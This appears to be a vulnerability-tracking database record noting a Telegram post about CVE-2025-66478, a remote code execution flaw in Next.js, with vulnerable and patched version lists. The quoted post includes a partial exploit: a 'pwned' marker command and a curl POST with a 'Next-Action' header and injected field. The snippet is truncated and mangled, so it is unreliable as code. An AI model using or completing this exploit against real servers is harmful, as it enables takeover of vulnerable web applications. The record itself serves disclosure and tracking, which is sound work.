{"uuid": "59cc3e57-648c-49f8-8b4c-36b23b42bf03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/iiLinux/3142", "content": "Remote code execution (RCE) vulnerability exploit in Next JS \n\nCVE-2025-66478\n\ncommand=\"id &gt; /tmp/pwned\"\n\ncat &gt; payload.json &lt; payload2.txt\n\nThen\ncurl -X POST http://localhost:3000 -H \"Next-Action: dontcare\" \\\n    -F \"0=/dev/null || true\nVulnerable versions of Next.js that embed a vulnerable React component are:\n\n15.x\n16.x\n14.3.0-canary.77 and later canary releases\nPatched versions are:\n\n15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7\n16.0.7", "creation_timestamp": "2026-07-10T00:00:11.240232Z"}